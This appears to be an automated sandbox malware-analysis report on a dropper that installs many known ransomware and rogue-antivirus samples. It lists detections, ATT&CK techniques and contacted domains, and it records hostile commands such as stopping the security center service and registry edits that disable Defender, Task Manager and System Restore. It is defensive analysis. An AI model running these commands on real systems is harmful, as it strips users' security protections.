          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\Desktop\4d44bed6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_0040E0E1 GetSystemTime,SystemTimeToFileTime,5_2_0040E0E1
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00406860 lstrlenA,GlobalAlloc,GetVersionExA,MultiByteToWideChar,WideCharToMultiByte,CreateStreamOnHGlobal,5_2_00406860

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefend
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Security Center FirewallDisableNotify
          Source: C:\Windows\antivirus-platinum.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from FirewallProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from FirewallProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiSpywareProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiSpywareProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiVirusProduct
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiVirusProduct
          Source: Endermanch@AntivirusPro2017.exe, 00000006.00000003.696383851.000000000291C000.00000004.00001000.00020000.00000000.sdmp, Endermanch@AntivirusPro2017.exe, 00000006.00000003.690237253.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, Endermanch@AntivirusPro2017.exe, 00000006.00000003.689960677.00000000028CC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: mcagent.exe
          Source: Endermanch@Cerber5.exe, 00000010.00000002.586235640.00000000015E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: C:\Users\user\Desktop\Fantom.exe, type: DROPPED
          Source: Yara matchFile source: 40.0.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.0.3F22.tmp.7ff730b90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.2.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.0.3F22.tmp.7ff730b90000.2.unpack, type: UNPACKEDPE
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: \\192.168.2.1\admin$\infpub.dat

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: C:\Users\user\Desktop\Fantom.exe, type: DROPPED
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Replication Through Removable Media
          11
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          921
          Disable or Modify Tools
          2
          Input Capture
          1
          System Time Discovery
          1
          Replication Through Removable Media
          1
          Archive Collected Data
          Exfiltration Over Other Network Medium13
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization3
          Inhibit System Recovery
          Default Accounts1
          Scripting
          2
          Windows Service
          1
          Access Token Manipulation
          1
          Scripting
          LSASS Memory11
          Peripheral Device Discovery
          Remote Desktop Protocol2
          Man in the Browser
          Exfiltration Over Bluetooth11
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Native API
          1
          Scheduled Task/Job
          2
          Windows Service
          21
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares2
          Input Capture
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          Scheduled Task/Job
          21
          Registry Run Keys / Startup Folder
          112
          Process Injection
          251
          Software Packing
          NTDS155
          System Information Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer3
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          Service Execution
          Network Logon Script1
          Scheduled Task/Job
          1
          DLL Side-Loading
          LSA Secrets2
          Network Share Discovery
          SSHKeyloggingData Transfer Size Limits24
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.common21
          Registry Run Keys / Startup Folder
          1
          File Deletion
          Cached Domain Credentials351
          Security Software Discovery
          VNCGUI Input CaptureExfiltration Over C2 Channel1
          Proxy
          Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items122
          Masquerading
          DCSync12
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Modify Registry
          Proc Filesystem131
          Virtualization/Sandbox Evasion
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)131
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadow1
          Remote System Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          Access Token Manipulation
          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron112
          Process Injection
          Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
          Rundll32
          KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task2
          Indicator Removal on Host
          GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 712620 Sample: 4d44bed6.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 125 www5.internet-security-guard.com 2->125 127 secure1.safe-scanerwas.com 2->127 129 7 other IPs or domains 2->129 155 Snort IDS alert for network traffic 2->155 157 Malicious sample detected (through community Yara rule) 2->157 159 Antivirus detection for URL or domain 2->159 161 16 other signatures 2->161 10 4d44bed6.exe 14 72 2->10         started        15 cmd.exe 2->15         started        17 svchost.exe 2->17         started        signatures3 process4 dnsIp5 143 raw.githubusercontent.com 10->143 145 google.ru 10->145 147 2 other IPs or domains 10->147 117 C:\Users\user\Desktop\Fantom.exe, PE32 10->117 dropped 119 C:\Users\user\Desktopndermanch@Xyeta.exe, PE32 10->119 dropped 121 C:\...ndermanch@WinlockerVB6Blacksod.exe, PE32 10->121 dropped 123 65 other malicious files 10->123 dropped 201 Writes many files with high entropy 10->201 19 Endermanch@BadRabbit.exe 10->19         started        23 Endermanch@AntivirusPlatinum.exe 1 13 10->23         started        25 Endermanch@Cerber5.exe 10->25         started        32 10 other processes 10->32 28 conhost.exe 15->28         started        30 WerFault.exe 17->30         started        file6 signatures7 process8 dnsIp9 99 C:\Windows\infpub.dat, data 19->99 dropped 177 Antivirus detection for dropped file 19->177 179 Multi AV Scanner detection for dropped file 19->179 181 Machine Learning detection for dropped file 19->181 34 rundll32.exe 19->34         started        38 conhost.exe 19->38         started        101 C:\Windows\antivirus-platinum.exe, PE32 23->101 dropped 103 C:\Windows\302746537.exe, PE32 23->103 dropped 113 2 other files (none is malicious) 23->113 dropped 183 Drops executables to the windows directory (C:\Windows) and starts them 23->183 40 302746537.exe 23->40         started        131 93.107.12.20 VODAFONE-IRELAND-ASNIE Ireland 25->131 133 93.107.12.21 VODAFONE-IRELAND-ASNIE Ireland 25->133 139 98 other IPs or domains 25->139 105 C:\Users\user\AppData\Local\Temp\...\68f6.tmp, b.out 25->105 dropped 185 Detected unpacking (changes PE section rights) 25->185 187 Detected unpacking (overwrites its own PE header) 25->187 189 Uses netsh to modify the Windows network and firewall settings 25->189 191 Modifies the windows firewall 25->191 42 netsh.exe 25->42         started        44 netsh.exe 25->44         started        135 searchdusty.com 32->135 137 raw.githubusercontent.com 32->137 141 4 other IPs or domains 32->141 107 C:\Users\user\AppData\Local\6AdwCleaner.exe, PE32 32->107 dropped 109 C:\Program Files (x86)\...\libltdl3.dll, PE32 32->109 dropped 111 C:\Program Files (x86)\...\avpc2009.exe, PE32 32->111 dropped 115 2 other files (none is malicious) 32->115 dropped 193 Creates an undocumented autostart registry key 32->193 195 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->195 197 Creates multiple autostart registry keys 32->197 199 5 other signatures 32->199 46 6AdwCleaner.exe 32->46         started        49 avpc2009.exe 32->49         started        51 net.exe 32->51         started        53 5 other processes 32->53 file10 signatures11 process12 dnsIp13 93 C:\Windows\dispci.exe, PE32 34->93 dropped 95 C:\Windows\cscc.dat, PE32+ 34->95 dropped 97 C:\Windows\3F22.tmp, data 34->97 dropped 163 System process connects to network (likely due to code injection or exploit) 34->163 165 Connects to many different private IPs via SMB (likely to spread or exploit) 34->165 167 Connects to many different private IPs (likely to spread or exploit) 34->167 175 4 other signatures 34->175 55 cmd.exe 34->55         started        57 cmd.exe 34->57         started        59 cmd.exe 34->59         started        68 3 other processes 34->68 61 cmd.exe 40->61         started        64 conhost.exe 42->64         started        66 conhost.exe 44->66         started        149 www.vikingwebscanner.com 46->149 169 Antivirus detection for dropped file 46->169 171 Multi AV Scanner detection for dropped file 46->171 173 Creates multiple autostart registry keys 46->173 151 yandex.ru 49->151 153 google.ru 49->153 70 2 other processes 51->70 72 4 other processes 53->72 file14 signatures15 process16 signatures17 85 3 other processes 55->85 74 conhost.exe 57->74         started        76 schtasks.exe 57->76         started        87 2 other processes 59->87 203 Drops executables to the windows directory (C:\Windows) and starts them 61->203 205 Uses schtasks.exe or at.exe to add and modify task schedules 61->205 78 antivirus-platinum.exe 61->78         started        81 conhost.exe 61->81         started        83 regsvr32.exe 61->83         started        89 2 other processes 61->89 91 5 other processes 68->91 process18 signatures19 207 Changes security center settings (notifications, updates, antivirus, firewall) 78->207 209 Disables the Windows task manager (taskmgr) 78->209 211 Disables Windows system restore 78->211 213 Disables the Windows registry editor (regedit) 78->213

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          4d44bed6.exe77%ReversingLabsByteCode-MSIL.Ransomware.PolyRansom
          4d44bed6.exe41%VirustotalBrowse
          4d44bed6.exe26%MetadefenderBrowse
          4d44bed6.exe100%AviraTR/Dropper.Gen
          4d44bed6.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\Desktop\Endermanch@Krotten.exe100%AviraTR/Sirery.A
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe100%AviraHEUR/AGEN.1224490
          C:\Users\user\Desktop\Endermanch@Cerber5.exe100%AviraHEUR/AGEN.1227089
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe100%AviraTR/Ransom.pfnaw
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe100%AviraTR/AD.FakeRean.mwfxa
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe100%AviraDR/Pasta.kdx
          C:\Users\user\AppData\Local\6AdwCleaner.exe100%AviraJOKE/Agent.rlham
          C:\Users\user\Desktop\Endermanch@Antivirus.exe100%AviraTR/Dldr.FraudLoad.xerf
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe100%AviraDR/Agent.aq.122610
          C:\Users\user\Desktop\Endermanch@Birele.exe100%AviraTR/BAS.Samca.fyzpg
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe100%AviraTR/Winwebsec.akyna
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe100%AviraTR/Fake.avpc.94312
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe100%AviraTR/Genasom.wzara
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe100%AviraPUA/HappyAV.A
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe100%AviraTR/Simda.igtnk
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe100%AviraHEUR/AGEN.1230144
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe100%AviraTR/Diskcoder.ezxim
          C:\Users\user\Desktop\Endermanch@Krotten.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@Cerber5.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@LPS2019.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@Birele.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe100%Joe Sandbox ML
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe62%ReversingLabsWin32.Rogue.FakeRean
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe56%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\bzip2.dll2%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\bzip2.dll4%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\libltdl3.dll0%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\libltdl3.dll4%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll0%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll4%MetadefenderBrowse
          C:\Users\user\AppData\Local\6AdwCleaner.exe60%ReversingLabsWin32.Rogue.Wadebooc
          C:\Users\user\AppData\Local\6AdwCleaner.exe52%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe68%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe24%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Antivirus.exe86%ReversingLabsWin32.Trojan.CoreGuardAntivirus2009
          C:\Users\user\Desktop\Endermanch@Antivirus.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe78%ReversingLabsWin32.Trojan.Pasta
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe28%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe92%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe93%ReversingLabsWin32.Ransomware.BadRabbit
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe83%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Birele.exe86%ReversingLabsWin32.Ransomware.Genasom
          C:\Users\user\Desktop\Endermanch@Birele.exe78%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Cerber5.exe91%ReversingLabsWin32.Ransomware.Cerber
          C:\Users\user\Desktop\Endermanch@Cerber5.exe76%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe92%ReversingLabsWin32.Ransomware.Derialock
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe69%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe70%ReversingLabsWin32.Trojan.MintPorcupine
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe37%ReversingLabsWin32.PUA.HappyAV
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe36%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe85%ReversingLabsByteCode-MSIL.Ransomware.Infinity
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe85%ReversingLabsWin32.Trojan.Simda
          C:\Users\user\Desktop\Endermanch@Krotten.exe96%ReversingLabsWin32.Trojan.Krotten
          C:\Users\user\Desktop\Endermanch@Krotten.exe86%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@LPS2019.exe59%ReversingLabsByteCode-MSIL.Trojan.Dnoper
          C:\Users\user\Desktop\Endermanch@LPS2019.exe24%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe95%ReversingLabsWin32.Trojan.Razy
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe80%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@NavaShield.exe51%ReversingLabsWin32.Ransomware.Crypmod
          C:\Users\user\Desktop\Endermanch@NavaShield.exe20%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@NoMoreRansom.exe91%ReversingLabsWin32.Ransomware.Troldesh
          C:\Users\user\Desktop\Endermanch@NoMoreRansom.exe72%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@PCDefender.exe70%ReversingLabsWin32.Backdoor.Zapchast
          C:\Users\user\Desktop\Endermanch@PCDefender.exe28%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Petya.A.exe100%ReversingLabsWin32.Ransomware.Petya
          C:\Users\user\Desktop\Endermanch@Petya.A.exe84%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@PolyRansom.exe95%ReversingLabsWin32.Ransomware.VirLock
          C:\Users\user\Desktop\Endermanch@PolyRansom.exe82%MetadefenderBrowse
          SourceDetectionScannerLabelLinkDownload
          13.0.Endermanch@Birele.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.Endermanch@BadRabbit.exe.80000.0.unpack100%AviraTR/ATRAPS.GenDownload File
          11.0.Endermanch@BadRabbit.exe.80000.1.unpack100%AviraTR/ATRAPS.GenDownload File
          11.0.Endermanch@BadRabbit.exe.80000.2.unpack100%AviraTR/ATRAPS.GenDownload File
